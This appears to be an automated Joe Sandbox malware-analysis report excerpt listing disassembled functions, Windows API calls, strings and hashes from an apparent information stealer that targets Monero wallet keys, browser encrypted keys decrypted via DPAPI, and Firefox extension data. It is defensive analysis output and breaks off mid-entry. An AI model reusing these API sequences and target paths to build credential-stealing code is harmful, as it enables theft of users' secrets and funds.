                                    • Associated: 00000000.00000002.2131924572.0000000000680000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2131939068.00000000006AC000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2131939068.00000000007BD000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2131939068.00000000007C9000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2131939068.00000000007EE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2131939068.0000000000956000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2132139185.000000000096A000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2132139185.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2132139185.0000000000BC6000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2132139185.0000000000BEE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2132139185.0000000000BF6000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2132139185.0000000000C06000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2132381993.0000000000C07000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2132485547.0000000000DA2000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2132499957.0000000000DA3000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_680000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                                    • String ID: <
                                    • API String ID: 1148417306-4251816714
                                    • Opcode ID: c968a11001954d91a25473a1b4f347f39acfdf7013a9b7c8ddb0d717e9463e73
                                    • Instruction ID: 3594d02d875b7c339f030d41cbf2176c0350fa52c9154de768223e097b326467
                                    • Opcode Fuzzy Hash: c968a11001954d91a25473a1b4f347f39acfdf7013a9b7c8ddb0d717e9463e73
                                    • Instruction Fuzzy Hash: E6313AB1911218ABDB54EB90DC92FDEB7BDAF18300F404188F205A7591DF746B48CFA9
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,006A0E10,00000000,?), ref: 006989BF
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 006989C6
                                    • wsprintfA.USER32 ref: 006989E0
                                      • Part of subcall function 0069AA50: lstrcpy.KERNEL32(006A0E1A,00000000), ref: 0069AA98
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2131939068.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                    • Associated: 00000000.00000002.2131924572.0000000000680000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2131939068.00000000006AC000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2131939068.00000000007BD000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2131939068.00000000007C9000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2131939068.00000000007EE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2131939068.0000000000956000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2132139185.000000000096A000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2132139185.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2132139185.0000000000BC6000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2132139185.0000000000BEE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2132139185.0000000000BF6000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2132139185.0000000000C06000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2132381993.0000000000C07000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2132485547.0000000000DA2000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2132499957.0000000000DA3000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_680000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateProcesslstrcpywsprintf
                                    • String ID: %dx%d
                                    • API String ID: 1695172769-2206825331
                                    • Opcode ID: 473da4563922040e6d24d9e6d0cb1bf27c02f97a525cecdb25f582bf43142d5a
                                    • Instruction ID: cc276620ab1b692937b2d09c9c2e52eadba1fb466bc2af007d3cd699d266aaf5
                                    • Opcode Fuzzy Hash: 473da4563922040e6d24d9e6d0cb1bf27c02f97a525cecdb25f582bf43142d5a
                                    • Instruction Fuzzy Hash: 442172B1A58304AFDB00DFD5ED45FAEBBB8FB49711F104119F615A7280C775A900CBA0
                                    APIs
                                    • LoadLibraryA.KERNEL32(C:\ProgramData\chrome.dll), ref: 0068A098
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2131939068.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                    • Associated: 00000000.00000002.2131924572.0000000000680000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2131939068.00000000006AC000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2131939068.00000000007BD000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2131939068.00000000007C9000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2131939068.00000000007EE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2131939068.0000000000956000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2132139185.000000000096A000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2132139185.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2132139185.0000000000BC6000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2132139185.0000000000BEE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2132139185.0000000000BF6000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2132139185.0000000000C06000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2132381993.0000000000C07000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2132485547.0000000000DA2000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2132499957.0000000000DA3000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_680000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: LibraryLoad
                                    • String ID: C:\ProgramData\chrome.dll$connect_to_websocket$free_result
                                    • API String ID: 1029625771-1545816527
                                    • Opcode ID: 1f5abc140a8f2aeb6fc872bd4f3eb322084d1948080d368484b0df65dbfa73b6
                                    • Instruction ID: 9db886440e592fd5146eab063075c7c2c1fff1e606f4a29952881203eb77e52c
                                    • Opcode Fuzzy Hash: 1f5abc140a8f2aeb6fc872bd4f3eb322084d1948080d368484b0df65dbfa73b6
                                    • Instruction Fuzzy Hash: FAF01D7066C304AFE700BBF6FC4CB66B2E6E30A302F000555E405972D0C3B59A84EF52
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,000000FA,?,?,006996AE,00000000), ref: 00698EEB
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00698EF2
                                    • wsprintfW.USER32 ref: 00698F08
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2131939068.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                    • Associated: 00000000.00000002.2131924572.0000000000680000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2131939068.00000000006AC000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2131939068.00000000007BD000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2131939068.00000000007C9000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2131939068.00000000007EE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2131939068.0000000000956000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2132139185.000000000096A000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2132139185.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2132139185.0000000000BC6000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2132139185.0000000000BEE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2132139185.0000000000BF6000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2132139185.0000000000C06000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2132381993.0000000000C07000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2132485547.0000000000DA2000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2132499957.0000000000DA3000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_680000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateProcesswsprintf
                                    • String ID: %hs
                                    • API String ID: 769748085-2783943728
                                    • Opcode ID: efda7f8f22d5ad009a0988b0acf966e161a7704669c5f96e321c136ba586c166
                                    • Instruction ID: bcd497ebeed3984ed4c0989f3dcd5a8fc6f3fa64a96e2cd9e128d7e710647774
                                    • Opcode Fuzzy Hash: efda7f8f22d5ad009a0988b0acf966e161a7704669c5f96e321c136ba586c166
                                    • Instruction Fuzzy Hash: F6E0B675A58309BBDB10DBD5ED0AA6DB7A8EB05702F000194FD0A96240DA719F10AB95
                                    APIs
                                      • Part of subcall function 0069AA50: lstrcpy.KERNEL32(006A0E1A,00000000), ref: 0069AA98
                                      • Part of subcall function 0069ACC0: lstrlen.KERNEL32(?,01428E68,?,\Monero\wallet.keys,006A0E1A), ref: 0069ACD5
                                      • Part of subcall function 0069ACC0: lstrcpy.KERNEL32(00000000), ref: 0069AD14
                                      • Part of subcall function 0069ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0069AD22
                                      • Part of subcall function 0069ABB0: lstrcpy.KERNEL32(?,006A0E1A), ref: 0069AC15
                                      • Part of subcall function 00698CF0: GetSystemTime.KERNEL32(006A0E1B,0142E6D0,006A05B6,?,?,006813F9,?,0000001A,006A0E1B,00000000,?,01428E68,?,\Monero\wallet.keys,006A0E1A), ref: 00698D16
                                      • Part of subcall function 0069AC30: lstrcpy.KERNEL32(00000000,?), ref: 0069AC82
                                      • Part of subcall function 0069AC30: lstrcat.KERNEL32(00000000), ref: 0069AC92
                                    • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0068AA11
                                    • lstrlen.KERNEL32(00000000,00000000), ref: 0068AB2F
                                    • lstrlen.KERNEL32(00000000), ref: 0068ADEC
                                      • Part of subcall function 0069AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0069AAF6
                                    • DeleteFileA.KERNEL32(00000000), ref: 0068AE73
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2131939068.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                    • Associated: 00000000.00000002.2131924572.0000000000680000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2131939068.00000000006AC000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2131939068.00000000007BD000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2131939068.00000000007C9000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2131939068.00000000007EE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2131939068.0000000000956000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2132139185.000000000096A000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2132139185.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2132139185.0000000000BC6000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2132139185.0000000000BEE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2132139185.0000000000BF6000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2132139185.0000000000C06000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2132381993.0000000000C07000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2132485547.0000000000DA2000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2132499957.0000000000DA3000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_680000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                    • String ID:
                                    • API String ID: 211194620-0
                                    • Opcode ID: 78eb01bbab1cf79d794b8ddbbd831bd6cff66229e91770503a454f0be5d9f134
                                    • Instruction ID: 29abed3b5d32123596ee9c7946a5318bc07d07a6c619b60b4b13ff97b135d8d9
                                    • Opcode Fuzzy Hash: 78eb01bbab1cf79d794b8ddbbd831bd6cff66229e91770503a454f0be5d9f134
                                    • Instruction Fuzzy Hash: 9CE1DD729141089BCF44FBE4DDA2EEEB37EAF14300F50855DF11676495EE306A48CBAA
                                    APIs
                                      • Part of subcall function 0069AA50: lstrcpy.KERNEL32(006A0E1A,00000000), ref: 0069AA98
                                      • Part of subcall function 0069ACC0: lstrlen.KERNEL32(?,01428E68,?,\Monero\wallet.keys,006A0E1A), ref: 0069ACD5
                                      • Part of subcall function 0069ACC0: lstrcpy.KERNEL32(00000000), ref: 0069AD14
                                      • Part of subcall function 0069ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0069AD22
                                      • Part of subcall function 0069ABB0: lstrcpy.KERNEL32(?,006A0E1A), ref: 0069AC15
                                      • Part of subcall function 00698CF0: GetSystemTime.KERNEL32(006A0E1B,0142E6D0,006A05B6,?,?,006813F9,?,0000001A,006A0E1B,00000000,?,01428E68,?,\Monero\wallet.keys,006A0E1A), ref: 00698D16
                                      • Part of subcall function 0069AC30: lstrcpy.KERNEL32(00000000,?), ref: 0069AC82
                                      • Part of subcall function 0069AC30: lstrcat.KERNEL32(00000000), ref: 0069AC92
                                    • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0068D581
                                    • lstrlen.KERNEL32(00000000), ref: 0068D798
                                    • lstrlen.KERNEL32(00000000), ref: 0068D7AC
                                    • DeleteFileA.KERNEL32(00000000), ref: 0068D82B
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2131939068.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                    • Associated: 00000000.00000002.2131924572.0000000000680000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2131939068.00000000006AC000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2131939068.00000000007BD000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2131939068.00000000007C9000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2131939068.00000000007EE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2131939068.0000000000956000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2132139185.000000000096A000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2132139185.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2132139185.0000000000BC6000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2132139185.0000000000BEE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2132139185.0000000000BF6000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2132139185.0000000000C06000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2132381993.0000000000C07000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2132485547.0000000000DA2000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2132499957.0000000000DA3000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_680000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                    • String ID:
                                    • API String ID: 211194620-0
                                    • Opcode ID: 4f74a326c76fcb206e31ea3c2422f52b772a62d7a98e054a85daef8efaa41c50
                                    • Instruction ID: cba32e298ec7f1c5dffc27f01206949e4ae59abeba28062bfa4701a3a32001da
                                    • Opcode Fuzzy Hash: 4f74a326c76fcb206e31ea3c2422f52b772a62d7a98e054a85daef8efaa41c50
                                    • Instruction Fuzzy Hash: 6A91DC729141089BCF44FBE4DDA2DEEB3BEAF54301F50456CF11666495EF306A08CBAA
                                    APIs
                                      • Part of subcall function 0069AA50: lstrcpy.KERNEL32(006A0E1A,00000000), ref: 0069AA98
                                      • Part of subcall function 0069ACC0: lstrlen.KERNEL32(?,01428E68,?,\Monero\wallet.keys,006A0E1A), ref: 0069ACD5
                                      • Part of subcall function 0069ACC0: lstrcpy.KERNEL32(00000000), ref: 0069AD14
                                      • Part of subcall function 0069ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0069AD22
                                      • Part of subcall function 0069ABB0: lstrcpy.KERNEL32(?,006A0E1A), ref: 0069AC15
                                      • Part of subcall function 00698CF0: GetSystemTime.KERNEL32(006A0E1B,0142E6D0,006A05B6,?,?,006813F9,?,0000001A,006A0E1B,00000000,?,01428E68,?,\Monero\wallet.keys,006A0E1A), ref: 00698D16
                                      • Part of subcall function 0069AC30: lstrcpy.KERNEL32(00000000,?), ref: 0069AC82
                                      • Part of subcall function 0069AC30: lstrcat.KERNEL32(00000000), ref: 0069AC92
                                    • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0068D901
                                    • lstrlen.KERNEL32(00000000), ref: 0068DA9F
                                    • lstrlen.KERNEL32(00000000), ref: 0068DAB3
                                    • DeleteFileA.KERNEL32(00000000), ref: 0068DB32
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2131939068.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_680000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                    • String ID:
                                    • API String ID: 211194620-0
                                    • Opcode ID: 17994a53089d034f34b5c9bbcbcd9bc14708c2b4933d50affe48776e000f8dcd
                                    • Instruction ID: f3c5fef3092250f5e8eb41210bb847bdec5119628473cc7398b9fda18697669f
                                    • Opcode Fuzzy Hash: 17994a53089d034f34b5c9bbcbcd9bc14708c2b4933d50affe48776e000f8dcd
                                    • Instruction Fuzzy Hash: 6981DC729141089BCF44FBE4DCA6DFEB3BEAF54301F50455CF11666495EE306A08CBAA
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2131939068.00000000006AC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_680000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: AdjustPointer
                                    • String ID:
                                    • API String ID: 1740715915-0
                                    • Opcode ID: 06145f3a63d5280db2389d3658a688964ecb7b0d80857c6917ca60528e3905ca
                                    • Instruction ID: c8588c8953d0d1e5558c6fcb2d96ba70e369ac22589271ff91df1d44bac8740a
                                    • Opcode Fuzzy Hash: 06145f3a63d5280db2389d3658a688964ecb7b0d80857c6917ca60528e3905ca
                                    • Instruction Fuzzy Hash: A451B07260220AEFEB298F54C841BBA77A6FF41320F24463DEA0597691E735ED40DB90
                                    APIs
                                    • LocalAlloc.KERNEL32(00000040,?), ref: 0068A664
                                      • Part of subcall function 0069AA50: lstrcpy.KERNEL32(006A0E1A,00000000), ref: 0069AA98
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2131939068.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_680000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: AllocLocallstrcpy
                                    • String ID: @$v10$v20
                                    • API String ID: 2746078483-278772428
                                    • Opcode ID: 9c0982253ada5ae673a9dcda6a2ff7d7730eaf1e2a671808ab3f75c0ab1356e4
                                    • Instruction ID: 1c6be4ff989e7bde6fb9c7f9058986896805d216fd7dd02e52672360124179ca
                                    • Opcode Fuzzy Hash: 9c0982253ada5ae673a9dcda6a2ff7d7730eaf1e2a671808ab3f75c0ab1356e4
                                    • Instruction Fuzzy Hash: FF513E74A10208DFDF14EFA4CD96BED77BAAF41340F008218E90A5F691EB706A45CB96
                                    APIs
                                      • Part of subcall function 0069AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0069AAF6
                                      • Part of subcall function 0068A110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0068A13C
                                      • Part of subcall function 0068A110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 0068A161
                                      • Part of subcall function 0068A110: LocalAlloc.KERNEL32(00000040,?), ref: 0068A181
                                      • Part of subcall function 0068A110: ReadFile.KERNEL32(000000FF,?,00000000,0068148F,00000000), ref: 0068A1AA
                                      • Part of subcall function 0068A110: LocalFree.KERNEL32(0068148F), ref: 0068A1E0
                                      • Part of subcall function 0068A110: CloseHandle.KERNEL32(000000FF), ref: 0068A1EA
                                      • Part of subcall function 00698FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00698FE2
                                      • Part of subcall function 0069AA50: lstrcpy.KERNEL32(006A0E1A,00000000), ref: 0069AA98
                                      • Part of subcall function 0069ACC0: lstrlen.KERNEL32(?,01428E68,?,\Monero\wallet.keys,006A0E1A), ref: 0069ACD5
                                      • Part of subcall function 0069ACC0: lstrcpy.KERNEL32(00000000), ref: 0069AD14
                                      • Part of subcall function 0069ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0069AD22
                                      • Part of subcall function 0069ABB0: lstrcpy.KERNEL32(?,006A0E1A), ref: 0069AC15
                                      • Part of subcall function 0069AC30: lstrcpy.KERNEL32(00000000,?), ref: 0069AC82
                                      • Part of subcall function 0069AC30: lstrcat.KERNEL32(00000000), ref: 0069AC92
                                    • StrStrA.SHLWAPI(00000000,00000000,00000000,?,?,00000000,?,006A1678,006A0D93), ref: 0068F64C
                                    • lstrlen.KERNEL32(00000000), ref: 0068F66B
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2131939068.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_680000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$FileLocal$Alloclstrcatlstrlen$CloseCreateFreeHandleReadSize
                                    • String ID: ^userContextId=4294967295$moz-extension+++
                                    • API String ID: 998311485-3310892237
                                    • Opcode ID: eec3afe3637bdf394827bad50078db7f0282443536b08d4c32e51963216f2d8a
                                    • Instruction ID: e45c7c498b1c4fc4fe045c74e085c6fc9876fb6f7973e2e18b600e4edbea3dc6
                                    • Opcode Fuzzy Hash: eec3afe3637bdf394827bad50078db7f0282443536b08d4c32e51963216f2d8a
                                    • Instruction Fuzzy Hash: 3051FA729101089BCF44FBE4DDA29FD73BEAF54300F40866CF41667595EE346A08CBAA
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2131939068.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_680000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$lstrlen
                                    • String ID:
                                    • API String ID: 367037083-0
                                    • Opcode ID: 0f0ff051e71fc2873ed1991fd7c8d0e0909aabb2748ae5df875931456fe19f71
                                    • Instruction ID: b7a4e9963502d35518ad3a68f1d48a3c655fa9e608698738157e7c7c46b5d7aa
                                    • Opcode Fuzzy Hash: 0f0ff051e71fc2873ed1991fd7c8d0e0909aabb2748ae5df875931456fe19f71
                                    • Instruction Fuzzy Hash: FE410871D14209ABDF04EFE4D955AEEB7BEAF44304F008018F516B6690EB70AA05CFA6
                                    APIs
                                      • Part of subcall function 0069AA50: lstrcpy.KERNEL32(006A0E1A,00000000), ref: 0069AA98
                                      • Part of subcall function 0068A110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0068A13C
                                      • Part of subcall function 0068A110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 0068A161
                                      • Part of subcall function 0068A110: LocalAlloc.KERNEL32(00000040,?), ref: 0068A181
                                      • Part of subcall function 0068A110: ReadFile.KERNEL32(000000FF,?,00000000,0068148F,00000000), ref: 0068A1AA
                                      • Part of subcall function 0068A110: LocalFree.KERNEL32(0068148F), ref: 0068A1E0
                                      • Part of subcall function 0068A110: CloseHandle.KERNEL32(000000FF), ref: 0068A1EA
                                      • Part of subcall function 00698FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00698FE2
                                    • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 0068A489
                                      • Part of subcall function 0068A210: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,>Oh,00000000,00000000), ref: 0068A23F
                                      • Part of subcall function 0068A210: LocalAlloc.KERNEL32(00000040,?,?,?,00684F3E,00000000,?), ref: 0068A251
                                      • Part of subcall function 0068A210: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,>Oh,00000000,00000000), ref: 0068A27A
                                      • Part of subcall function 0068A210: LocalFree.KERNEL32(?,?,?,?,00684F3E,00000000,?), ref: 0068A28F
                                      • Part of subcall function 0068A2B0: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 0068A2D4
                                      • Part of subcall function 0068A2B0: LocalAlloc.KERNEL32(00000040,00000000), ref: 0068A2F3
                                      • Part of subcall function 0068A2B0: LocalFree.KERNEL32(?), ref: 0068A323
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2131939068.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_680000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpy
                                    • String ID: $"encrypted_key":"$DPAPI
                                    • API String ID: 2100535398-738592651
                                    • Opcode ID: 2456b86fef27d82f0c78150734f7cc14c86a3e859031127ce66aebc22a0fa345
                                    • Instruction ID: 340426e123131ee2c53743f1373afc8c660c8466b0fb6c021f6c08c7176a798e
                                    • Opcode Fuzzy Hash: 2456b86fef27d82f0c78150734f7cc14c86a3e859031127ce66aebc22a0fa345
                                    • Instruction Fuzzy Hash: D43184B6D00209ABDF04EFE4DC45AEFB3BABF59300F044619E901A7241E7349E44CBA6
                                    APIs
                                      • Part of subcall function 0069AA50: lstrcpy.KERNEL32(006A0E1A,00000000), ref: 0069AA98
                                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,006A05BF), ref: 0069885A
                                    • Process32First.KERNEL32(?,00000128), ref: 0069886E
                                    • Process32Next.KERNEL32(?,00000128), ref: 00698883
                                      • Part of subcall function 0069ACC0: lstrlen.KERNEL32(?,01428E68,?,\Monero\wallet.keys,006A0E1A), ref: 0069ACD5
                                      • Part of subcall function 0069ACC0: lstrcpy.KERNEL32(00000000), ref: 0069AD14
                                      • Part of subcall function 0069ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0069AD22
                                      • Part of subcall function 0069ABB0: lstrcpy.KERNEL32(?,006A0E1A), ref: 0069AC15
                                    • CloseHandle.KERNEL32(?), ref: 006988F1
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2131939068.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_680000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                                    • String ID:
                                    • API String ID: 1066202413-0
                                    • Opcode ID: 973f26103569c15fff9a14443ca1527ebeedd64569de591c6085c7f5622df1ea
                                    • Instruction ID: 75a7102583267cac2bf676609a3b9d7fe23c347f16017354aa6bf0a974ce5b9d
                                    • Opcode Fuzzy Hash: 973f26103569c15fff9a14443ca1527ebeedd64569de591c6085c7f5622df1ea
